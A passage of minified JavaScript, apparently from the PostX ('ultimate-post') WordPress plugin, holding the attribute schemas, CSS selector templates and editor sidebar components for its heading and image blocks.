More",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}]}]},headingStyle:{type:"string",default:"style9"},headingTag:{type:"string",default:"h2"},headingAlign:{type:"string",default:"left",style:[{depends:[{key:"headingAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-heading-inner,\n          {{ULTP}} .ultp-sub-heading-inner{ text-align:{{headingAlign}}; margin-right: auto !important; }"},{depends:[{key:"headingAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-heading-inner, \n          {{ULTP}} .ultp-sub-heading-inner { text-align:{{headingAlign}}; margin-left: auto !important; margin-right: auto !important; }"},{depends:[{key:"headingAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-heading-inner,\n          {{ULTP}} .ultp-sub-heading-inner { text-align:{{headingAlign}}; margin-left: auto !important;}"}]},headingTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"700"},style:[{selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-inner, {{ULTP}} .ultp-heading-wrap .ultp-heading-inner a"}]},headingColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-heading-inner span { color:{{headingColor}}; }"}]},headingBorderBottomColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n          {{ULTP}} .ultp-heading-inner span:after { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:before { border-color:{{headingBorderBottomColor}}; }"}]},headingBorderBottomColor2:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"}]},headingBg:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-style5 .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n          {{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n          {{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span, \n          {{ULTP}} .ultp-heading-inner span:after { background-color:{{headingBg}}; }"}]},headingBg2:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg2}}; }"}]},headingBtnTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn"}]},headingBtnColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn { color:{{headingBtnColor}}; } \n          {{ULTP}} .ultp-heading-wrap .ultp-heading-btn svg { color:{{headingBtnColor}}; }"}]},headingBtnHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover { color:{{headingBtnHoverColor}}; } \n          {{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover svg { color:{{headingBtnHoverColor}}; }"}]},headingBorder:{type:"string",default:"3",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n          {{ULTP}} .ultp-heading-inner span:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n          {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n          {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n          {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"}]},headingSpacing:{type:"object",default:{lg:20,sm:10,unit:"px"},style:[{selector:"{{ULTP}} .ultp-heading-wrap { margin-top:0; margin-bottom:{{headingSpacing}}; }"}]},headingRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"}]},headingPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"}]},subHeadingShow:{type:"boolean",default:!1},subHeadingText:{type:"string",default:"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer ut sem augue. Sed at felis ut enim dignissim sodales.",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},subHeadingTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"27",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div"}]},subHeadingColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div { color:{{subHeadingColor}}; }"}]},subHeadingSpacing:{type:"object",default:{lg:{top:"8",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { margin:{{subHeadingSpacing}}; }"}]},enableWidth:{type:"toggle",default:!1,style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},customWidth:{type:"object",default:{lg:{top:"",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0},{key:"enableWidth",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { max-width:{{customWidth}}; }"}]},...l(69735).KF,...(0,o.t)(["advanceAttr"],["loadingColor"])}},58910:(e,t,l)=>{"use strict";var o=l(67294),a=l(58065),i=l(6534),n=l(19209);const{__}=wp.i18n,{registerBlockType:r,createBlock:s}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/heading.svg",alt:"Heading"}),attributes:i.Z,transforms:{from:[{type:"block",blocks:["core/heading","core/paragraph"],transform:e=>s("ultimate-post/heading",{headingText:e?.content})}]},edit:a.Z,save:()=>null})},57283:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(9790);const{__}=wp.i18n,{InspectorControls:r,RichText:s,useBlockProps:p}=wp.blockEditor,{useState:c,useEffect:u,Fragment:d}=wp.element,{Spinner:m}=wp.components,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const[t,l]=c("Content"),[b,v]=c({device:"lg",setDevice:"",postsList:[],loading:!1,error:!1,section:"Content"}),{setAttributes:h,name:f,clientId:k,attributes:w,className:x,attributes:{previewImg:T,blockId:_,advanceId:C,headingText:E,imageUpload:S,imgLink:P,imgAlt:L,imgOverlay:I,imgOverlayType:B,imgAnimation:U,headingColor:M,headingTypo:A,headingEnable:H,headingMargin:N,linkTarget:j,alignment:Z,btnLink:O,btnText:R,btnTarget:D,btnPosition:z,linkType:F,darkImgEnable:W,darkImage:V,imgCrop:G,dcEnabled:q,currentPostId:$}}=e;u((()=>{const e=k.substr(0,6),t=g(y(k));(0,a.qi)(h,t,$,k),_?_&&_!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[k]);const K=S?.size&&S?.size[G]?S?.size[G]?.url?S?.size[G]?.url:S?.size[G]:S.url?S.url:ultp_data.url+"assets/img/ultp-placeholder.jpg";let J;if(_&&(J=(0,i.Kh)(w,"ultimate-post/image",_,(0,a.k0)())),T)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:T});const Y=wp.data.select("core/block-editor").getBlock(k),X={handleLoader:e=>{v({loading:e})},setAttributes:h,name:f,attributes:w,setSection:l,section:t,clientId:k,block:Y,setDevice:e=>{e&&v({device:e})},setState:v,state:b},Q=p({...C&&{id:C},className:`ultp-block-${_} ${x}`});return(0,o.createElement)(d,null,(0,o.createElement)(r,null,(0,o.createElement)(n.Z,{store:X}),(0,a.dH)()),(0,o.createElement)("div",Q,J&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:J}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("figure",{className:"ultp-image-block-wrapper"},(0,o.createElement)("div",{className:`ultp-image-block ultp-image-block-${U} ${!0===I?"ultp-image-block-overlay ultp-image-block-"+B:""} ${b.loading?" ultp-loading-active":""}`},K&&!b.loading?"link"==F&&P?(0,o.createElement)("a",null,(0,o.createElement)("img",{className:"ultp-image",src:K,alt:L||"Image"})):(0,o.createElement)("img",{className:"ultp-image",src:K,alt:L||"Image"}):(0,o.createElement)(d,null,(0,o.createElement)("img",{className:"ultp-image",src:K,alt:L||"Image"}),(0,o.createElement)(m,null)),"button"==F&&O&&(0,o.createElement)("div",{className:`ultp-image-button ultp-image-button-${z}`},(0,o.createElement)("a",{href:"#"},R))),H&&E&&(0,o.createElement)(s,{key:"editable",tagName:"figcaption",className:"ultp-image-caption",placeholder:__("Add Text…","ultimate-post"),onChange:e=>h({headingText:e}),value:E})))))}},9790:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(67294),a=l(53049),i=l(69735),n=l(74971),r=l(22465),s=l(68477),p=l(3780),c=l(22217),u=l(60405),d=l(92637);const{__}=wp.i18n,{Fragment:m}=wp.element,{TextControl:g,PanelBody:y,SelectControl:b}=wp.components,v=({store:e})=>{const{handleLoader:t,setAttributes:l,name:v,attributes:h,setSection:f,section:k,clientId:w,block:x,setDevice:T,setState:_,state:C}=e,{imageUpload:E,imgLink:S,imgAlt:P,headingColor:L,headingTypo:I,headingEnable:B,headingMargin:U,linkTarget:M,alignment:A,btnLink:H,btnText:N,btnTarget:j,btnPosition:Z,linkType:O,darkImgEnable:R,darkImage:D,dcEnabled:z}=h;return(0,o.createElement)(m,null,(0,o.createElement)(d.Sections,{classes:"ultp-imageBlock-sidebar-setting"},(0,o.createElement)(d.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(p.Z,{label:__("Upload Image","ultimate-post"),multiple:!1,block:"image-block",type:["image"],panel:!0,value:E,handleLoader:t,dcEnabled:z.imageUpload,DynamicContent:(0,o.createElement)(n.ZP,{headingBlock:x,attrKey:"imageUpload",isActive:!1,config:{disableAdv:!0,disableLink:!0,fieldType:"image"}}),onChange:e=>{l({imageUpload:e,imgAlt:e?.alt?e.alt:"Image Not Found",headingText:e?.caption?e.caption:"This is a Image Example"})}}),(0,o.createElement)(g,{className:"ultp-field-wrap",__nextHasNoMarginBottom:!0,label:__("Image Alt Text","ultimate-post"),value:P,onChange:e=>l({imgAlt:e})}),(0,o.createElement)(s.Z,{justify:!0,inline:!0,label:__("Link Type","ultimate-post"),options:[{label:__("Link","ultimate-post"),value:"link"},{label:__("Button","ultimate-post"),value:"button"}],value:O,onChange:e=>l({linkType:e})}),"link"==O&&(0,o.createElement)(m,null,(0,o.createElement)(r.nv,{value:S,placeholder:"Enter Custom URL",onChange:e=>l({imgLink:e}),isTextField:!0,label:__("Link Url","ultimate-post"),attr:{label:__("Link","ultimate-post"),disabled:z.imgLink},DC:(0,i.o6)()?(0,o.createElement)(n.ZP,{headingBlock:x,isActive:!1,attrKey:"imgLink",config:{linkOnly:!0,disableAdv:!0,fieldType:"url"}}):null}),(0,o.createElement)(c.Z,{label:__("Link Target","ultimate-post"),value:M||"",options:[{label:__("Self","ultimate-post"),value:"_self"},{label:__("Blank","ultimate-post"),value:"_blank"}],onChange:e=>l({linkTarget:e})})),"button"==O&&(0,o.createElement)(m,null,(0,o.createElement)(g,{className:"ultp-field-wrap",label:__("Button Text","ultimate-post"),value:N,onChange:e=>l({btnText:e})}),(0,o.createElement)(r.nv,{value:H,onChange:e=>l({btnLink:e}),isTextField:!0,attr:{label:__("Button Link","ultimate-post"),disabled:z.btnLink},DC:(0,i.o6)()?(0,o.createElement)(n.ZP,{headingBlock:x,isActive:!1,attrKey:"btnLink",config:{linkOnly:!0,disableAdv:!0,fieldType:"url"}}):null}),(0,o.createElement)(b,{__nextHasNoMarginBottom:!0,label:__("Button Link Target","ultimate-post"),value:j||"",options:[{label:__("Self","ultimate-post"),value:"_self"},{label:__("Blank","ultimate-post"),value:"_blank"}],onChange:e=>l({btnTarget:e})}),(0,o.createElement)(b,{__nextHasNoMarginBottom:!0,label:__("Button Position","ultimate-post"),value:Z||"",options:[{label:__("Left Top","ultimate-post"),value:"leftTop"},{label:__("Right Top","ultimate-post"),value:"rightTop"},{label:__("Center Center","ultimate-post"),value:"centerCenter"},{label:__("Bottom Left","ultimate-post"),value:"bottomLeft"},{label:__("Bottom Right","ultimate-post"),value:"bottomRight"}],onChange:e=>l({btnPosition:e})})),(0,o.createElement)(u.Z,{label:__("Enable Caption","ultimate-post"),value:B,onChange:e=>l({headingEnable:e})}),(0,o.createElement)(y,{className:"ultp-imageBlock-darkmode-setting",title:__("Dark Mode Image","ultimate-post")},(0,o.createElement)("div",{className:"ultp-imageBlock-darkmode-setting__body"},(0,o.createElement)(u.Z,{label:__("Enable Dark Image","ultimate-post"),value:R,onChange:e=>l({darkImgEnable:e})}),R&&(0,o.createElement)(p.Z,{label:__("Upload Dark Mode Image","ultimate-post"),multiple:!1,type:["image"],panel:!0,value:D,dcEnabled:z.darkImage,DynamicContent:(0,o.createElement)(n.ZP,{headingBlock:x,attrKey:"darkImage",isActive:!1,config:{disableAdv:!0,disableLink:!0,fieldType:"image"}}),onChange:e=>{l({darkImage:e})}})))),(0,o.createElement)(d.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.Hn,{store:e,initialOpen:!0,exclude:["imgCropSmall","imgAnimation"],include:[{position:0,data:{type:"select",key:"imgAnimation",label:__("Image Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"roateLeft",label:__("Rotate Left","ultimate-post")},{value:"rotateRight",label:__("Rotate Right","ultimate-post")}]}},{position:1,data:{type:"alignment",key:"imgAlignment",label:__("Image Align","ultimate-post"),responsive:!0,disableJustify:!0}}]}),B&&(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Caption","ultimate-post"),include:[{position:0,data:{type:"alignment",key:"alignment",label:__("Alignment","ultimate-post"),responsive:!0,icons:["left","center","right"]}},{position:1,data:{type:"color",key:"headingColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"typography",key:"headingTypo",label:__("Typography","ultimate-post")}},{position:3,data:{type:"dimension",key:"headingMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),"button"==O&&(0,o.createElement)(a.ZJ,{store:e})),(0,o.createElement)(d.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))}},74412:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(92165),a=l(69735);const i={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},imageUpload:{type:"object",default:{id:"999999",url:ultp_data.url+"assets/img/ultp-placeholder.jpg"}},darkImgEnable:{type:"boolean",default:!1},darkImage:{type:"object",default:{url:ultp_data.url+"assets/img/ultp-placeholder.jpg"}},linkType:{type:"string",default:"link"},imgLink:{type:"string",default:""},linkTarget:{type:"string",default:"_blank"},imgAlt:{type:"string",default:"Image"},imgAlignment:{type:"object",default:{lg:"left"},style:[{selector:"{{ULTP}} .ultp-image-block-wrapper {text-align: {{imgAlignment}};}"}]},imgCrop:{type:"string",default:"full"},imgWidth:{type:"object",default:{lg:"",ulg:"px"},style:[{selector:"{{ULTP}} .ultp-image-block { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-image-block {object-fit: cover; height: {{imgHeight}}; } \n          {{ULTP}} .ultp-image-block .ultp-image {height: 100%;}"}]},imageScale:{type:"string",default:"cover",style:[{selector:"{{ULTP}} .ultp-image-block img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"none"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{selector:"{{ULTP}} .ultp-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{selector:"{{ULTP}} .ultp-image-block:hover .ultp-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-image-block { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-image-block:hover { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-image-block"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-image-block:hover"}]},imgMargin:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} .ultp-image-block { margin: {{imgMargin}}; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-image-block::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-image-block::before { opacity: {{imgOpacity}}; }"}]},imgLazy:{type:"boolean",default:!1},imgSrcset:{type:"boolean",default:!1},headingText:{type:"string",default:"This is a Image Example"},headingEnable:{type:"boolean",default:!1},headingColor:{type:"string",default:"",style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-caption { color:{{headingColor}}; }"}]},alignment:{type:"object",default:{lg:"left"},style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-caption {text-align: {{alignment}};}"}]},headingTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"",transform:"",family:"",weight:""},style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-caption"}]},headingMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"headingEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-image-caption { margin:{{headingMargin}}; }"}]},buttonEnable:{type:"boolean",default:!1},btnText:{type:"string",default:"Free Download"},btnLink:{type:"string",default:"#"},btnTarget:{type:"string",default:"_blank"},btnPosition:{type:"string",default:"centerCenter"},btnTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"",decoration:"none",family:""},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a"}]},btnColor:{type:"string",default:"#fff",style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a { color:{{btnColor}}; }"}]},btnBgColor:{type:"object",default:{openColor:1,type:"color",color:"#037fff"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}}  .ultp-image-button a"}]},btnBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a"}]},btnRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a { border-radius:{{btnRadius}}; }"}]},btnShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a"}]},btnHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a:hover { color:{{btnHoverColor}}; }"}]},btnBgHoverColor:{type:"object",default:{openColor:1,type:"color",color:"#1239e2"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a:hover"}]},btnHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a:hover"}]},btnHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a:hover { border-radius:{{btnHoverRadius}}; }"}]},btnHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a:hover"}]},btnSacing:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-block-wrapper .ultp-image-button a { margin:{{btnSacing}}; 